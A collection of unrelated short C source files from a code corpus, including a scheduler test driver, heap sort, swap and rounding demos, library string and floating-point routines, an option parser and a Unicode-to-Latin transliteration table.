{
alloc_proc_num = 0;
num_processes = 0;
}
/* test driver */
main(argc, argv)
int argc;
char *argv[];
{
int command;
int prio;
float ratio;
int status;
if (argc < (MAXPRIO+1))
{
fprintf(stdout, "incorrect usage\n");
return;
}
initialize();
for (prio=MAXPRIO; prio >= 1; prio--)
{
init_prio_queue(prio, atoi(argv[prio]));
}
for (status = fscanf(stdin, "%d", &command);
((status!=EOF) && status);
status = fscanf(stdin, "%d", &command))
{
switch(command)
{
case FINISH:
finish_process();
break;
case BLOCK:
block_process();
break;
case QUANTUM_EXPIRE:
quantum_expire();
break;
case UNBLOCK:
fscanf(stdin, "%f", &ratio);
unblock_process(ratio);
break;
case UPGRADE_PRIO:
fscanf(stdin, "%d", &prio);
fscanf(stdin, "%f", &ratio);
if (prio > MAXPRIO || prio <= 0) {
fprintf(stdout, "** invalid priority\n");
return;
}
else
upgrade_process_prio(prio, ratio);
break;
case NEW_JOB:
fscanf(stdin, "%d", &prio);
if (prio > MAXPRIO || prio <= 0) {
fprintf(stdout, "** invalid priority\n");
return;
}
else
add_process(prio);
break;
case FLUSH:
finish_all_processes();
break;
}
}
}
/* A simple input spec:
a.out n3 n2 n1
where n3, n2, n1 are non-negative integers indicating the number of
initial processes at priority 3, 2, and 1, respectively.
The input file is a list of commands of the following kinds:
(For simplicity, comamnd names are integers (NOT strings)
FINISH ;; this exits the current process (printing its number)
NEW_JOB priority ;; this adds a new process at specified priority
BLOCK ;; this adds the current process to the blocked queue
QUANTUM_EXPIRE ;; this puts the current process at the end
;; of its prioqueue
UNBLOCK ratio ;; this unblocks a process from the blocked queue
;; and ratio is used to determine which one
UPGRADE_PRIO small-priority ratio ;; this promotes a process from
;; the small-priority queue to the next higher priority
;; and ratio is used to determine which process
FLUSH ;; causes all the processes from the prio queues to
;; exit the system in their priority order
where
NEW_JOB 1
UPGRADE_PRIO 2
BLOCK 3
UNBLOCK 4
QUANTUM_EXPIRE 5
FINISH 6
FLUSH 7
and priority is in 1..3
and small-priority is in 1..2
and ratio is in 0.0..1.0
The output is a list of numbers indicating the order in which
processes exit from the system.
*/
|
the_stack_data/1152939.c | #include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <math.h>
//we will use math.h to call some math functions from c library
// in this module we will add floor function and ceil function for rounding
// floor is used to rounding down numbers
// ceil is used to rounding up the numbers
int main()
{
float a = 9.8132;
float b = 6.4;
printf("round down number %.2f \n",floor(a)); // ans . 9
printf("round down number %.2f \n",floor(b)); // ans . 6
printf("round down number %.2f \n",ceil(a)); // ans . 10
printf("round down number %.2f \n",ceil(b)); // ans . 7
return 0;
}
|
the_stack_data/26700334.c | /*-
* Copyright (c) 2013 Niclas Zeising
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* $FreeBSD: head/lib/libc/string/strchrnul.c 246766 2013-02-13 15:46:33Z zeising $
*/
#include <stddef.h>
#include <string.h>
__weak_reference(__strchrnul, strchrnul);
char *
__strchrnul(const char *p, int ch)
{
char c;
c = ch;
for (;; ++p) {
if (*p == c || *p == '\0')
return ((char *)p);
}
/* NOTREACHED */
}
|
the_stack_data/958003.c | // Heap Sort in C
#include <stdio.h>
// Function to swap the the position of two elements
void swap(int *a, int *b) {
int temp = *a;
*a = *b;
*b = temp;
}
void heapify(int arr[], int n, int i) {
// Find largest among root, left child and right child
int largest = i;
int left = 2 * i + 1;
int right = 2 * i + 2;
if (left < n && arr[left] > arr[largest])
largest = left;
if (right < n && arr[right] > arr[largest])
largest = right;
// Swap and continue heapifying if root is not largest
if (largest != i) {
swap(&arr[i], &arr[largest]);
heapify(arr, n, largest);
}
}
// Main function to do heap sort
void heapSort(int arr[], int n) {
// Build max heap
for (int i = n / 2 - 1; i >= 0; i--)
heapify(arr, n, i);
// Heap sort
for (int i = n - 1; i >= 0; i--) {
swap(&arr[0], &arr[i]);
// Heapify root element to get highest element at root again
heapify(arr, i, 0);
}
}
// Print an array
void printArray(int arr[], int n) {
for (int i = 0; i < n; ++i)
printf("%d ", arr[i]);
printf("\n");
}
// Driver code
int main() {
int arr[] = {1, 12, 9, 5, 6, 10};
int n = sizeof(arr) / sizeof(arr[0]);
heapSort(arr, n);
printf("Sorted array is \n");
printArray(arr, n);
} |
the_stack_data/165769370.c | #include <stdio.h>
#include <string.h>
int main()
{
char name[30], surname[30];
printf("Ismingizni kiriting: "); scanf("%s", name);
printf("Familiyangizni kiriting: "); scanf("%s", surname);
char ism[30], fam[30];
int n=strlen(name), m=strlen(surname);
if (n%2==0) { n=n/2; }
else { n=n/2+1; }
strcpy(ism, surname+m/2);
strcat(ism, name+n/2+1);
puts(ism);
return 0;
} |
the_stack_data/415737.c | #include <stdio.h>
#include <stdlib.h>
void swap(int*, int*);
void swap_long(long*, long*);
int main()
{
int a = 3;
int b = 4;
printf("Before swap, a = %d, b = %d\n", a, b);
swap(&a, &b);
printf("After swap, a = %d, b = %d\n", a, b);
long c = 3l;
long d = 4l;
printf("Before swap_long, c = %ld, d = %ld\n", c, d);
swap_long(&c, &d);
printf("After swap_long, c = %ld, d = %ld\n", c, d);
return 0;
}
void swap(int* xp, int* yp)
{
int t0 = *(xp);
int t1 = *(yp);
*(xp) = t1;
*(yp) = t0;
}
void swap_long(long* xp, long* yp)
{
long t0 = *(xp);
long t1 = *(yp);
*(xp) = t1;
*(yp) = t0;
}
|
the_stack_data/94657.c | extern void __VERIFIER_error() __attribute__ ((__noreturn__));
extern void __VERIFIER_assume(int);
void __VERIFIER_assert(int cond) { if(!(cond)) { ERROR: __VERIFIER_error(); } }
extern int __VERIFIER_nondet_int(void);
int N;
int main()
{
N = __VERIFIER_nondet_int();
if(N <= 0) return 1;
int i;
int sum;
int a[N];
sum = 0;
for(i=0; i<N; i++)
{
sum = sum + 1;
}
for(i=0; i<N; i++)
{
a[i] = sum % N;
}
for(i=0; i<N; i++)
{
__VERIFIER_assert(a[i] == 0);
}
return 1;
}
|
the_stack_data/672223.c | //
// Created by cescript on 23.02.2018.
//
#include <stdint.h>
#include <string.h>
#include <stdlib.h>
char *getopt_find(char *option, char *param) {
uint32_t optionLen = strlen(option);
uint32_t paramLen = strlen(param);
uint32_t idx = 0;
for(uint32_t i=0; i < optionLen; i++) {
uint32_t ii = i, j = 0;
while( (j < paramLen) & (ii < optionLen) && (option[ii++] == param[j++]));
if(j == paramLen && option[ii] == ':') {
idx = ii;
break;
}
}
char *start = NULL;
if(idx != 0 && idx != optionLen) {
start = option + idx;
}
return start;
}
uint32_t getopt_int32_t(char *option, char *param, int32_t *values) {
uint32_t count = 0;
// get the starting position of the parameter
char *start, *end = getopt_find(option, param);
// if the substing found, fill the given array
if(end != NULL) {
do {
start = end + 1;
values[count++] = (int32_t)strtol(start, &end, 10);
} while(end[0] == 'x');
}
return count;
}
uint32_t getopt_uint32_t(char *option, char *param, uint32_t *values) {
uint32_t count = 0;
// get the starting position of the parameter
char *start, *end = getopt_find(option, param);
// if the substing found, fill the given array
if(end != NULL) {
do {
start = end + 1;
values[count++] = (uint32_t)strtoul(start, &end, 10);
} while(end[0] == 'x');
}
return count;
}
uint32_t getopt_double(char *option, char *param, double *values) {
uint32_t count = 0;
// get the starting position of the parameter
char *start, *end = getopt_find(option, param);
// if the substing found, fill the given array
if(end != NULL) {
do {
start = end + 1;
values[count++] = strtod(start, &end);
} while(end[0] == 'x');
}
return count;
}
uint32_t getopt_float(char *option, char *param, float *values) {
uint32_t count = 0;
// get the starting position of the parameter
char *start, *end = getopt_find(option, param);
// if the substing found, fill the given array
if(end != NULL) {
do {
start = end + 1;
values[count++] = (float)strtod(start, &end);
} while(end[0] == 'x');
}
return count;
}
|
the_stack_data/161081215.c | /* Set current rounding direction.
Copyright (C) 1997, 1998 Free Software Foundation, Inc.
This file is part of the GNU C Library.
The GNU C Library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
The GNU C Library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with the GNU C Library; if not, write to the Free
Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA
02111-1307 USA. */
#include <fenv.h>
int
fesetround (int round)
{
/* We only support FE_TONEAREST, so there is no need for any work. */
return (round == FE_TONEAREST)?0:1;
}
|
the_stack_data/75099.c | /* Copyright (c) 2014-2019 Bruce A Henderson
This software is provided 'as-is', without any express or implied
warranty. In no event will the authors be held liable for any damages
arising from the use of this software.
Permission is granted to anyone to use this software for any purpose,
including commercial applications, and to alter it and redistribute it
freely, subject to the following restrictions:
1. The origin of this software must not be misrepresented; you must not
claim that you wrote the original software. If you use this software
in a product, an acknowledgment in the product documentation would be
appreciated but is not required.
2. Altered source versions must be plainly marked as such, and must not be
misrepresented as being the original software.
3. This notice may not be removed or altered from any source
distribution.
*/
char * transChars[65535] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"0","1","2","3","4","5","6","7","8","9",0,0,0,0,0,0,0,"A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z",0,0,0,0,0,0,"a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z",0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"A","A","A","A","A","A","AE","C","E","E","E","E","I","I","I","I","D","N","O","O","O","O","O",0,"O","U","U","U","U","Y","TH","ss","a","a","a","a","a","a","ae","c","e","e","e","e","i","i","i","i","d","n","o","o","o","o","o",0,"o","u","u","u","u","y","th","y","A","a",
"A","a","A","a","C","c","C","c","C","c","C","c","D","d","D","d","E","e","E","e","E","e","E","e","E","e","G","g","G","g","G","g","G","g","H","h","H","h","I","i","I","i","I","i","I","i","I","i","IJ","ij","J","j","K","k","q","L","l","L","l","L","l","L","l","L","l","N","n","N","n","N","n",0,"N","n","O","o","O","o","O","o","OE","oe","R","r","R","r","R","r","S","s","S","s","S","s","S","s","T","t","T","t","T","t","U","u","U","u","U","u","U","u","U","u","U","u","W","w","Y","y","Y","Z","z","Z","z","Z","z","s","b","B","B",
"b",0,0,0,"C","c","D","D","D","d",0,0,0,"E","F","f","G",0,"hv","I","I","K","k","l",0,0,"N","n",0,"O","o","OI","oi","P","p",0,0,0,0,0,"t","T","t","T","U","u",0,"V","Y","y","Z","z",0,0,0,0,0,0,0,0,0,0,0,0,0,"DZ","Dz","dz","LJ","Lj","lj","NJ","Nj","nj","A","a","I","i","O","o","U","u","U","u","U","u","U","u","U","u",0,"A","a","A","a","AE","ae","G","g","G","g","K","k","O","o","O","o",0,0,"j","DZ","Dz","dz","G","g",0,0,"N","n","A","a","AE","ae","O","o","A","a","A","a",
"E","e","E","e","I","i","I","i","O","o","O","o","R","r","R","r","U","u","U","u","S","s","T","t",0,0,"H","h",0,"d",0,0,"Z","z","A","a","E","e","O","o","O","o","O","o","O","o","Y","y","l","n","t","j","db","qp","A","C","c","L","T","s","z",0,0,"B","U",0,"E","e","J","j",0,0,"R","r","Y","y",0,0,0,"b",0,"c","d","d",0,0,0,"e",0,0,0,"j","g","g","G",0,0,0,"h","h","i",0,"I","l","l","l",0,0,0,"m","n","n","N",0,"OE",0,0,0,0,0,"r","r","r",0,"R",0,"s",0,0,
0,0,0,"t","u",0,"v",0,0,0,"Y","z","z",0,0,0,0,0,0,0,"B",0,"G","H","j",0,"L","q",0,0,"dz",0,"dz","ts",0,0,0,"ls","lz",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"i",0,0,0,0,0,0,0,0,0,0,0,"A",
0,"E","E","I",0,"O",0,"Y","O","i","A","B","G","D","E","Z","E","TH","I","K","L","M","N","X","O","P","R",0,"S","T","Y","PH","CH","PS","O","I","Y","a","e","e","i","y","a","b","g","d","e","z","e","th","i","k","l","m","n","x","o","p","r","s","s","t","y","ph","ch","ps","o","i","y","o","y","o",0,"b","th","Y","Y","Y","ph","p",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"k","r","s","j","TH","e",0,"S","s","S","S","s",0,0,0,0,"E","E","D","G","E","Z","I","I",
"J","L","N","C","K","I","U","D","A","B","V","G","D","E","Z","Z","I","J","K","L","M","N","O","P","R","S","T","U","F","H","C","C","S","S",0,"Y",0,"E","U","A","a","b","v","g","d","e","z","z","i","j","k","l","m","n","o","p","r","s","t","u","f","h","c","c","s","s",0,"y",0,"e","u","a","e","e","d","g","e","z","i","i","j","l","n","c","k","i","u","d",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,"G","g","G","g","G","g",0,0,"Z","z",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"Z","z",0,0,0,0,0,0,0,0,0,0,0,0,0,"A","a","A","a","AE","ae","E","e",0,0,0,0,"Z","z","Z","z",0,0,"I","i","I","i","O","o",0,0,0,0,"E","e","U","u","U","u","U","u","C","c",0,0,"Y","y",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"A","B","G","D","E","Z","E",0,0,"Z","I","L","X","C","K","H","J","G","C","M","Y","N","S","O",0,"P","J","R","S","V","T","R",0,"W",0,0,"O","F",0,0,0,0,0,0,0,0,0,0,"a","b","g","d","e","z","e",0,0,"z","i","l","x","c","k","h","j","g","c","m","y","n","s","o",0,"p","j","r","s","v","t","r",0,"w",0,0,"o","f","ev",0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"e","e","a","o","i","e","e","a","a","o",0,"u",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"b","g","d","h","w","z","h","t","y","k","k","l","m","m","n","n","s",0,"p","p","z","z","q","r","s","t",0,0,0,0,0,"ww","wy","yy",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"a","a","w","a","y","a","b","t","t","th","j","h","kh","d","dh","r","z","s","sh","s","d","t","z",0,"gh",0,0,0,0,0,0,"f","q","k","l","m","n","h","w","y","y",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"p",0,0,0,0,0,0,0,"ch",0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,"zh",0,0,0,0,0,0,0,0,0,0,0,"v",0,0,0,0,"k",0,0,0,"ng",0,"g",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"v","y",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,"b","g","g","d","dr","h","w","z","h","t","t","y","yh","k","l","m","n","s","s",0,"p","p","s","q","r","sh","t",0,0,0,"a","a","a","o","o","a","e","e","e","e","i","i","u","u","u","o",0,0,"i",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"h","s","n","r","b","l","k",0,"v","m","f","d","t","l","g",
"n","s","d","z","t","y","p","j","c","tt","h","kh","dh",0,"s","s","d","t",0,0,"g","q",0,"a","a","i","i","u","u","e","e","o","o","",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"m","m","h","","a","a","i","i","u","u","r","l","e","e","e","ai","o",
"o","o","au","ka","kha","ga","gha","na","ca","cha","ja","jha","na","ta","tha","da","dha","na","ta","tha","da","dha","na","na","pa","pha","ba","bha","ma","ya","ra","ra","la","la","la","va","sa","sa","sa","ha",0,0,"",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"",0,0,0,0,0,"","",0,0,0,"qa","kha","ga","za","ra","rha","fa","ya","r","l",0,0,0,0,"0","1","2","3","4","5","6","7","8","9",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"m","m","h",0,"a","a","i","i","u","u","r","l",0,0,"e","ai",0,0,
"o","au","ka","kha","ga","gha","na","ca","cha","ja","jha","na","ta","tha","da","dha","na","ta","tha","da","dha","na",0,"pa","pha","ba","bha","ma","ya","ra",0,"la",0,0,0,"sa","sa","sa","ha",0,0,"",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"","t",0,0,0,0,0,0,0,0,"",0,0,0,0,"ra","rha",0,"ya","r","l",0,0,0,0,"0","1","2","3","4","5","6","7","8","9","ra","ra","","","","","","","","","",0,0,0,0,0,0,"m","m",0,0,"a","a","i","i","u","u",0,0,0,0,"e","ai",0,0,"o",
"au","ka","kha","ga","gha","na","ca","cha","ja","jha","na","ta","tha","da","dha","na","ta","tha","da","dha","na",0,"pa","pha","ba","bha","ma","ya","ra",0,"la","la",0,"va","sa",0,"sa","ha",0,0,"",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"",0,0,0,0,0,0,0,0,0,0,0,"kha","ga","za","ra",0,"fa",0,0,0,0,0,0,0,"0","1","2","3","4","5","6","7","8","9","","","","","",0,0,0,0,0,0,0,0,0,0,0,0,"m","m","h",0,"a","a","i","i","u","u","r","l","e",0,"e","ai","o",0,"o","au",
"ka","kha","ga","gha","na","ca","cha","ja","jha","na","ta","tha","da","dha","na","ta","tha","da","dha","na",0,"pa","pha","ba","bha","ma","ya","ra",0,"la","la",0,"va","sa","sa","sa","ha",0,0,"",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"r","l",0,0,0,0,"0","1","2","3","4","5","6","7","8","9",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"m","m","h",0,"a","a","i","i","u","u","r","l",0,0,"e","ai",0,0,"o","au","ka",
"kha","ga","gha","na","ca","cha","ja","jha","na","ta","tha","da","dha","na","ta","tha","da","dha","na",0,"pa","pha","ba","bha","ma","ya","ra",0,"la","la",0,"va","sa","sa","sa","ha",0,0,"",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"",0,0,0,0,0,0,0,0,"","",0,0,0,0,"ra","rha",0,"ya","r","l",0,0,0,0,"0","1","2","3","4","5","6","7","8","9","","wa",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"m","h",0,"a","a","i","i","u","u",0,0,0,"e","e","ai",0,"o","o","au","ka",0,
0,0,"na","ca",0,"ja",0,"na","ta",0,0,0,"na","ta",0,0,0,"na","na","pa",0,0,0,"ma","ya","ra","ra","la","la","la","va","sa","sa","sa","ha",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"",0,0,0,0,0,0,0,0,0,"",0,0,0,0,0,0,0,0,0,0,0,0,0,0,"0","1","2","3","4","5","6","7","8","9","10","100","1000",0,0,0,0,0,0,0,0,0,0,0,0,0,0,"m","m","h",0,"a","a","i","i","u","u","r","l",0,"e","e","ai",0,"o","o","au","ka","kha","ga",
"gha","na","ca","cha","ja","jha","na","ta","tha","da","dha","na","ta","tha","da","dha","na",0,"pa","pha","ba","bha","ma","ya","ra","ra","la","la",0,"va","sa","sa","sa","ha",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"",0,0,0,0,0,0,0,"","",0,0,0,0,0,0,0,0,0,"r","l",0,0,0,0,"0","1","2","3","4","5","6","7","8","9",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"m","h",0,"a","a","i","i","u","u","r","l",0,"e","e","ai",0,"o","o","au","ka","kha","ga","gha",
"na","ca","cha","ja","jha","na","ta","tha","da","dha","na","ta","tha","da","dha","na",0,"pa","pha","ba","bha","ma","ya","ra","ra","la","la",0,"va","sa","sa","sa","ha",0,0,"",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"",0,0,0,0,0,0,0,"","",0,0,0,0,0,0,0,"la",0,"r","l",0,0,0,0,"0","1","2","3","4","5","6","7","8","9",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"m","h",0,"a","a","i","i","u","u","r","l",0,"e","e","ai",0,"o","o","au","ka","kha","ga","gha","na",
"ca","cha","ja","jha","na","ta","tha","da","dha","na","ta","tha","da","dha","na",0,"pa","pha","ba","bha","ma","ya","ra","ra","la","la","la","va","sa","sa","sa","ha",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"",0,0,0,0,0,0,0,0,0,"",0,0,0,0,0,0,0,0,"r","l",0,0,0,0,"0","1","2","3","4","5","6","7","8","9",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"k","kh","kh","kh",0,"kh","ng","c","ch","ch","s","ch","y","d","t","th","th",0,"n","d","t","th","th","th","n","b","p",
"ph","f","ph","f","ph","m","y","r","v","l","l","w","s",0,"s","h","l","x","h",0,"a","a","a","a","i","i","u","u","u","u",0,0,0,0,0,0,"e","ae","o","i","i","i",0,0,0,0,0,0,0,0,0,0,"0","1","2","3","4","5","6","7","8","9",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"a","b","g","d","e","v","z","t","i",0,"l","m","n","o",0,"zh","r","s",0,"u","p","k","gh",0,"sh","ch","ts","dz",0,0,"kh","j","h",0,0,"ui","q",0,0,0,0,0,0,0,0,0,0,0,"g","kk","n","d","tt","l","m","b","pp","s","ss","","j","jj","ch","k","t","p","h",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"a","ae","ya","yae","eo","e","yeo","ye","o","wa","wae","oe","yo","u","wo","we","wi","yu","eu","ui","i",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
